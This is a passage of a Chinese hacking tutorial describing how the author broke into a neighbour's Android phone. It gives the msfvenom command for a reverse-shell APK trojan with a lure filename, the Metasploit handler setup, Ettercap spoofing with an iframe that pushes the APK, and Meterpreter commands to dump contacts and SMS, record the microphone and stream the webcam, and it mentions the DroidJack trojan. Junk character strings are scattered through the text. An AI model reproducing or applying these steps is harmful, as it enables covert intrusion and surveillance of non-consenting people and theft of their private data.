& }- V) X! Y/ c
五、msf+ettercap入侵邻居安卓手机 % v9 s1 O8 s7 j
! @2 V D1 y+ W2 I
9 a5 y- r+ j' j+ }* o
首先启动msf % S) B6 E0 d0 a" u: L4 c" }
: o6 @; I4 |' X* V% O1 ?2 s6 l. P, M6 Y( Q4 d
先用kali生成一个安卓木马,如下命令:
/ P' Q+ g+ r, ]( }6 a4 E3 L 5 ], W" ]! L5 m1 W3 o0 O' N! l
1 Y& w8 J- G6 j7 b" z1 ?( j2 W
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk % v9 }( e% k# z. D6 c# M* d* C# j1 e
' z+ a/ {9 Y8 P1 b5 W2 S+ N
0 h( @ X, d/ F* c% B) V
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 2 X# U4 b0 O, Z" E" o8 k
& q8 T6 E# R2 R( S) B0 ?& m! i
4 O2 S }$ q" u; o7 ~& \ 然后进入msf + a8 p! @3 c C2 j' _, u
R* N* i$ [9 n2 Y# \
+ l9 q! t6 A P" e; m4 F1 a, w9 ]
use exploit/multi/handler 4 y2 F# G6 A0 o; }
8 e- }6 A+ ^8 y6 \* }- ?- T6 Z
6 p0 P) G* O' z* L set payload android/meterpreter/reverse_tcp ; u" b7 q# X$ L
# t: ^& C w! t3 v3 e3 f$ t
7 X1 g- u% V2 _) ^' K
set LHOST 192.168.0.109 //ip为kaili的ip 8 l) e9 w0 Q7 F
' J+ O: n* B: b- B6 Y$ v; L3 X8 {7 C) s. T% W6 v1 B
set LPORT 44444 //端口一定要与前面生成的木马的端口一致
# j) K' I; p( c+ W
$ [' `! S7 \/ f' d0 R: @2 U! ?( f4 t( S9 F+ g
Exploit - c [$ G2 P: r6 M# m* Q. ]! b; }
+ Z/ @1 l. M. ?/ q3 Y: g
; u: H' s! Q3 }
9 T- V. T: J/ \8 r3 d
2 g; `' G- |! k( s* S' y
7 H( Q7 c" R# i0 r0 M- |! W0 d 下面我们开启ettercap -G
$ D+ @! H* g. N0 x" i% r 0 d$ O8 O3 z& ]4 Z# B- [
1 C* g. O5 ]$ X( I
我物理IP为 " n8 }# z4 U0 j0 @ B/ s8 S4 ?
' g# B/ O& v1 q' e
' n9 g0 u0 {% w
4 t/ M& B7 I) O! A
1 I6 s) I1 D. e$ C9 L; y% d9 @/ C1 g; u" H& K5 l
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, % O& P! D! N9 h, d7 h. u
G2 g5 a: V# C$ v% w5 F
/ K* w2 L1 ~' m* \4 S( j+ Y4 i# x 下面我们来设置一下 V7 x& ^! E4 `$ J( [5 E
* K% x+ a; Y1 T0 L- {4 r- a# u! o* ?* S
5 g7 I9 Q2 N9 G# ?# u
" a( F5 f- H# v. ]% p& O5 O
+ ~$ t5 F" n5 b# \ 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 1 q# y, e* e d) B+ [: E- B
6 `3 |% K: j" B8 p- d
6 @, v& B1 U/ d- b1 N: h
5 m$ R/ r& `# \, j& W/ r o+ {
, m7 ]7 A5 r; [
/ L8 J0 K* P( L5 S& D0 [
3 K! i0 ?1 A; n4 p( J0 {: q* u 1 t6 ]' q( S. B+ k2 l& p/ R
& [7 P& S' M2 ^ 4 \4 R+ ]3 \7 ^& N. ~' Z5 H2 x
( J( ]# ] F7 B5 A# R% X' B8 N
+ ^" J5 r5 `$ n, P V+ n
& l& i# o; Q$ k+ n' U
; L7 y+ y; R, a: O3 L) b( k+ |! p& Q
7 ^6 [2 s* L% n I2 C
9 B/ T2 G4 o3 R/ ]5 z2 X0 g# r4 p U6 g! ? a2 V
N k' A5 L& P* B9 ^
3 e! [! k) z( ^, y' A
' R+ Z3 A# e" s0 p
2 I( P" N7 o/ J8 j0 w, }* K 8 e( j: l2 p M* C4 `* I" x
, _/ X: b) e, x6 A# }
9 o- U& R3 Y& ]% s! L 1 r4 M, ^; X4 h% s; }; S. V- h
. ~) P& b+ c( M) n $ q4 ^: ]% w4 z, n8 \
1 ?! e8 |" W' A. M- I
% o) x, E; j. f4 r9 a6 c, H
& y2 ~+ i; Q/ o9 N( B5 S % }/ N7 G F, r6 ~- R
0 r3 ~& ?8 r. {1 a- d
5 Y. c9 V6 e9 ^- H0 {
% L0 o+ g9 E- n- R k
M- ]8 o, `7 v, ~7 h 3 ?3 X9 [* k, n0 }; l1 T) u
1 d4 E& T1 [8 K2 T% f% }
; |% n9 N$ {1 u+ _$ H . a3 h& p9 y5 L% r$ I+ J$ q& h6 W
9 e% z8 r8 a h0 b& j# c
7 U* B6 d/ N1 l" B 下面我们开始攻击 1 q3 u: Z9 q9 X. d
) p- |" s; E/ I7 J$ K5 l' i1 j, j ~( Y8 \. Q
% ?8 ]& O) a& ?+ J5 ~8 i
1 b( l: V7 Y, P! x' f$ H4 ?* I" J
5 x3 s4 g. d& \; H1 A1 [7 k
4 ]7 `9 i$ p/ C( n) c7 B
; O3 ~8 p: a4 ?8 q/ h0 d/ l2 B$ Z- m0 {0 h% A6 W3 _7 n
* M L) _7 Q& n/ t$ m7 K& q
2 B, Y: G- z; B' |- I/ ~1 R4 i
: F8 f8 ^0 W! N1 \ ^3 V ! F% @8 ^& t; i4 F+ c! }
A) k4 o4 ]9 w7 ~5 y2 G3 Y/ w/ p7 O9 b, m" C# y8 ^
6 ^6 E! o% h0 h2 G3 z$ L
1 M/ I7 y; }/ K, f3 P( t' |. P, u3 I' b# {, y
大概过了5分钟多,发现反弹成功了 / Y) Y$ u D5 e) d* L2 Z
' x+ T" X) `, S7 v& }$ u. Z
. s3 N8 F: L9 M " G3 I5 Z8 o5 K: D3 T: z
7 Y# t/ B d" S
2 { k( ]( h8 S! n 6 K- C8 w# l5 U6 Z
! b6 R4 i, S: a9 `/ r, @1 |9 V9 [ h3 j' Y% n" i
) l3 {$ l1 k' Q- b! ~4 s% o
$ D h* P( Y: T5 Q- Y& G8 Q
9 W" v* X9 O6 j/ `) J! \7 n; d
) a+ t0 S0 j' n7 R( k2 N1 c ' Z7 [+ \. `0 D! B2 C. p( X8 C
7 Q- R& I, D+ S- |% k: q1 K
1 E1 y# w+ z# A- p: c) c6 f/ w( m
- B1 \5 E* n- i9 l8 J3 ~' i
B5 b/ q* [* V8 {- J# W + g2 Q! v* ^; ]' w- T, \ e8 U, ?# C
$ e w( R, i8 w' q2 _# H# [! j( M3 I9 A! i
r8 A5 \% H( L9 K% {
6 z/ N. Y: H1 Z# J B& @# n9 H/ d3 p7 c, H0 Z/ }2 j' @
执行命令 & W1 f$ w; c: o
2 U( m* q; U2 |6 d( E+ r8 Y
/ D0 |) k! a4 M8 W. v3 ]' d 9 X+ Y7 V! X2 T% b' ^/ H
/ i0 ?" @) O! [, ?* S
) j: Q: y; U. ]7 N8 G dump_contacts --》这个是导出电话 5 Z; T% l# d7 N% P0 h' c* u
+ t l8 F2 I, e! h! U# P# S: f) G2 @
, S) u# R. K. Y+ `; h! \) ^ dump_sms --》这个是导出信息
0 j6 R9 |/ `! B8 w+ O
% J. F3 L3 [6 i( F
' N+ x6 N/ t1 W' _) Y1 m/ @ record_mic Record audio from the default microphone for X seconds
0 ^7 }# L) Y* Z
8 v8 ~/ }! q2 O$ k& e% i1 m% ^/ s+ `5 O1 b: p2 k/ ]% x; A
webcam_chat Start a video chat
; s) g5 ?0 t5 n; v7 X2 B* e6 u ! d- ~' I! `1 Q) ~8 z0 ^+ M
1 p/ \8 | ^4 D
webcam_list List webcams 0 A8 N; c- b% D* T. h% a; l! {) K
- f7 V! `0 f4 \) r' B1 G9 Q. |
1 Q" t v# j' |7 ~ f {3 T webcam_snap Take a snapshot from the specified webcam
Q2 ]8 O1 Z' v8 A 1 K0 R& t4 M- h' B. q
: X2 U. ]: V2 @! Q4 j
webcam_stream  lay a video stream from the specified webcam
2 B) P/ L2 Q' @
`8 {8 k% }" l) q k# p, F, J
/ [0 G, b, M9 X- b" Y7 B 2 I' x- d6 T* l1 ^
8 t1 _: L: J! u7 N9 ?1 @# P
0 w! v' s. g a0 T: n
* D! \' A5 Y3 Q( j, k% i% B. m% F4 A! r" c' }; t
我们打开看一下电话薄, ' y; w7 y, e7 M' `: V
$ R9 S7 M. S$ ^ d: I1 t
; ~" Z: r8 y; _0 N3 U9 F
% q5 L( ?3 A B6 a
, U4 B+ J/ F' V' [ }& v5 e, a6 M2 z7 A" c. }! e
0 m4 o {: N$ l+ g* Y5 h
+ v9 s: f' l, O: M+ j! d' t/ P D2 z
' H7 G8 n+ n+ \2 b ; A7 K5 P% ? F0 @2 q
5 ?' u" G6 }4 x8 } \6 x% s) H
$ o& w. e! n# c* @, G5 c
' k! }1 x! k g8 i
! D: t0 j: T( S- o/ u0 c4 l& S* j
5 F5 s `( c: u+ u 4 ^- [! g" a7 R; Y, K
1 j/ [' | F" m- v7 H) D
, K1 [+ E, `; L0 [% e1 x) l . Z% z5 f9 L2 [7 @7 V9 L0 T
0 o t5 v4 ]6 z; A% Q6 ?
我们同时欺骗成DroidJack木马,使用方法如图:
' C0 P/ w! p' H( h 1 K: R* R3 e& L( }7 E8 _# n
$ ?4 l/ D0 x; p! v& G
u! O% u, {% p( q% v- D7 e* j
( K, p4 U# c; L) I- N, O' [4 X# D% u+ Z6 [- W$ E7 l6 h _
8 B' T0 g" a" L, u8 r) C ; ~/ q7 ], W- r; e' o
. X5 y$ }( P0 Y6 n/ J
# X) B% G& D Z2 a$ f0 e+ b
5 S; l$ ~% [# ~2 j& m5 `
' o' }9 a' k, }, ?0 K/ J 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
" \0 }/ J# P% k$ t0 c* v6 a$ A: x : F2 S* s; H9 [; Q
8 P( ^9 K7 g; h, W0 G , M. L4 U! V T" M5 k
; s$ i& {2 K3 `1 z, k/ V+ Y& q. \2 s
( m+ b7 A# ^" v1 Y" E* |2 y, s 7 G0 V5 M# a6 n3 j5 S# k0 I% y
7 s5 M! U, C4 ]. G" V: {" n! e% _9 @# ^# ?, w3 Q
; N" g! ^8 L3 y0 |- p ! R; d! R! ]1 U$ S) ]) B
5 O8 A1 }5 ] K6 @ k! A
" U! e; K) L' Q) @* w- s V J6 V) z' |0 Q1 A; `' K7 a" O
2 m m! R: n1 E8 y- Z
/ ^4 S' C& v& r1 D |